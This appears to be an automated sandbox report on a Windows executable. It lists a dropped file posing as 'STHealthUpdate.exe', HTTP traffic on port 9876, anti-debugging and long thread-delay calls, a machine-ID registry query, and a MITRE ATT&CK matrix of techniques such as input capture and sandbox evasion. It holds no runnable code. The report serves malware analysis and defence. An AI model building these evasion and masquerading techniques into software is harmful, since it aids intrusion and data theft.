Source: 0.3.BaGkRDSifo.exe.5734f52.0.raw.unpack, R2mIapWar4cwoqqx6Q.cs	High entropy of concatenated method names: 'IWZ4FNxMCV', 'X4o4BaXNNW', 'ReR4PkWY9i', 'XZO4yOqtpA', 'pcT48wm9UY', 'Y9l4jroko9', 'OY84tBcMwd', 'JrQ4qkE5mX', 'iRM4R10ean', 'AGe45CEX5X'

Source: C:\Users\user\Desktop\BaGkRDSifo.exe

File created: C:\Users\user\Desktop\STHealthUpdate.exe

Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49701 -> 9876
Source: unknown	Network traffic detected: HTTP traffic on port 9876 -> 49701
Source: unknown	Network traffic detected: HTTP traffic on port 49701 -> 9876
Source: unknown	Network traffic detected: HTTP traffic on port 9876 -> 49701

Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Memory allocated: 24E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Memory allocated: 31B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Memory allocated: 2EF0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\BaGkRDSifo.exe

0_2_004019F0

Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Thread delayed: delay time: 599889	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Thread delayed: delay time: 599446	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Thread delayed: delay time: 599186	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Thread delayed: delay time: 599078	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Thread delayed: delay time: 598968	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Thread delayed: delay time: 598857	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Thread delayed: delay time: 598750	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Thread delayed: delay time: 598641	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Thread delayed: delay time: 598531	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Thread delayed: delay time: 598422	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Thread delayed: delay time: 598312	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Thread delayed: delay time: 598203	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Thread delayed: delay time: 598094	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Thread delayed: delay time: 597984	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Thread delayed: delay time: 597875	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Thread delayed: delay time: 597765	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Thread delayed: delay time: 597656	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Thread delayed: delay time: 597547	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Thread delayed: delay time: 597437	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Thread delayed: delay time: 597327	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Thread delayed: delay time: 597200	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Thread delayed: delay time: 597078	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Thread delayed: delay time: 596949	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Thread delayed: delay time: 596813	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Thread delayed: delay time: 596688	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Thread delayed: delay time: 596563	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Thread delayed: delay time: 596438	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Thread delayed: delay time: 596313	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Thread delayed: delay time: 596188	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Thread delayed: delay time: 596078	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Thread delayed: delay time: 595969	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Thread delayed: delay time: 595844	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Thread delayed: delay time: 595734	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Thread delayed: delay time: 595625	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Thread delayed: delay time: 595516	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Thread delayed: delay time: 595406	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Thread delayed: delay time: 595297	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Thread delayed: delay time: 595188	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Thread delayed: delay time: 595063	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Thread delayed: delay time: 594953	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Thread delayed: delay time: 594844	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Thread delayed: delay time: 594719	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Thread delayed: delay time: 594609	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Thread delayed: delay time: 594493	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Thread delayed: delay time: 594364	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Thread delayed: delay time: 594235	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Thread delayed: delay time: 594125	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Thread delayed: delay time: 594016	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Thread delayed: delay time: 593891	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Window / User API: threadDelayed 3275			Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Window / User API: threadDelayed 6527			Jump to behavior

Source: C:\Users\user\Desktop\BaGkRDSifo.exe

Dropped PE file which has not been started: C:\Users\user\Desktop\STHealthUpdate.exe

Jump to dropped file

Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 4516	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820	Thread sleep time: -12912720851596678s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820	Thread sleep time: -599889s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820	Thread sleep time: -599781s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820	Thread sleep time: -599446s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820	Thread sleep time: -599328s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820	Thread sleep time: -599186s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820	Thread sleep time: -599078s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820	Thread sleep time: -598968s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820	Thread sleep time: -598857s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820	Thread sleep time: -598750s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820	Thread sleep time: -598641s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820	Thread sleep time: -598531s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820	Thread sleep time: -598422s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820	Thread sleep time: -598312s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820	Thread sleep time: -598203s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820	Thread sleep time: -598094s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820	Thread sleep time: -597984s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820	Thread sleep time: -597875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820	Thread sleep time: -597765s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820	Thread sleep time: -597656s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820	Thread sleep time: -597547s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820	Thread sleep time: -597437s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820	Thread sleep time: -597327s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820	Thread sleep time: -597200s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820	Thread sleep time: -597078s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820	Thread sleep time: -596949s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820	Thread sleep time: -596813s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820	Thread sleep time: -596688s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820	Thread sleep time: -596563s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820	Thread sleep time: -596438s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820	Thread sleep time: -596313s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820	Thread sleep time: -596188s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820	Thread sleep time: -596078s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820	Thread sleep time: -595969s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820	Thread sleep time: -595844s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820	Thread sleep time: -595734s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820	Thread sleep time: -595625s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820	Thread sleep time: -595516s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820	Thread sleep time: -595406s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820	Thread sleep time: -595297s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820	Thread sleep time: -595188s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820	Thread sleep time: -595063s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820	Thread sleep time: -594953s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820	Thread sleep time: -594844s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820	Thread sleep time: -594719s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820	Thread sleep time: -594609s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820	Thread sleep time: -594493s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820	Thread sleep time: -594364s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820	Thread sleep time: -594235s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820	Thread sleep time: -594125s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820	Thread sleep time: -594016s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820	Thread sleep time: -593891s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 4516	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Thread delayed: delay time: 599889	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Thread delayed: delay time: 599446	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Thread delayed: delay time: 599186	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Thread delayed: delay time: 599078	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Thread delayed: delay time: 598968	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Thread delayed: delay time: 598857	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Thread delayed: delay time: 598750	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Thread delayed: delay time: 598641	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Thread delayed: delay time: 598531	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Thread delayed: delay time: 598422	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Thread delayed: delay time: 598312	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Thread delayed: delay time: 598203	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Thread delayed: delay time: 598094	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Thread delayed: delay time: 597984	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Thread delayed: delay time: 597875	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Thread delayed: delay time: 597765	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Thread delayed: delay time: 597656	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Thread delayed: delay time: 597547	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Thread delayed: delay time: 597437	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Thread delayed: delay time: 597327	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Thread delayed: delay time: 597200	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Thread delayed: delay time: 597078	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Thread delayed: delay time: 596949	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Thread delayed: delay time: 596813	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Thread delayed: delay time: 596688	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Thread delayed: delay time: 596563	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Thread delayed: delay time: 596438	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Thread delayed: delay time: 596313	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Thread delayed: delay time: 596188	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Thread delayed: delay time: 596078	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Thread delayed: delay time: 595969	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Thread delayed: delay time: 595844	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Thread delayed: delay time: 595734	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Thread delayed: delay time: 595625	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Thread delayed: delay time: 595516	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Thread delayed: delay time: 595406	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Thread delayed: delay time: 595297	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Thread delayed: delay time: 595188	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Thread delayed: delay time: 595063	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Thread delayed: delay time: 594953	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Thread delayed: delay time: 594844	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Thread delayed: delay time: 594719	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Thread delayed: delay time: 594609	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Thread delayed: delay time: 594493	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Thread delayed: delay time: 594364	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Thread delayed: delay time: 594235	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Thread delayed: delay time: 594125	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Thread delayed: delay time: 594016	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Thread delayed: delay time: 593891	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: BaGkRDSifo.exe, 00000000.00000002.2490141797.0000000005830000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllX

Source: C:\Users\user\Desktop\BaGkRDSifo.exe

API call chain: ExitProcess graph end node

graph_0-95026

Source: C:\Users\user\Desktop\BaGkRDSifo.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\BaGkRDSifo.exe

Code function: 0_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

0_2_0040CE09

Source: C:\Users\user\Desktop\BaGkRDSifo.exe

0_2_004019F0

Source: C:\Users\user\Desktop\BaGkRDSifo.exe

0_2_004019F0

Source: C:\Users\user\Desktop\BaGkRDSifo.exe

Code function: 0_2_0040ADB0 GetProcessHeap,HeapFree,

0_2_0040ADB0

Source: C:\Users\user\Desktop\BaGkRDSifo.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Code function: 0_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_0040CE09
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Code function: 0_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_0040E61C
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Code function: 0_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00416F6A
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Code function: 0_2_004123F1 SetUnhandledExceptionFilter,	0_2_004123F1

Source: C:\Users\user\Desktop\BaGkRDSifo.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\BaGkRDSifo.exe

Code function: GetLocaleInfoA,

0_2_00417A20

Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\BaGkRDSifo.exe

Code function: 0_2_00412A15 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

0_2_00412A15

Source: C:\Users\user\Desktop\BaGkRDSifo.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Command and Scripting Interpreter	1 DLL Side-Loading	1 DLL Side-Loading	1 Masquerading	1 Input Capture	1 System Time Discovery	Remote Services	1 Input Capture	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Disable or Modify Tools	LSASS Memory	31 Security Software Discovery	Remote Desktop Protocol	11 Archive Collected Data	11 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	31 Virtualization/Sandbox Evasion	Security Account Manager	31 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	11 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
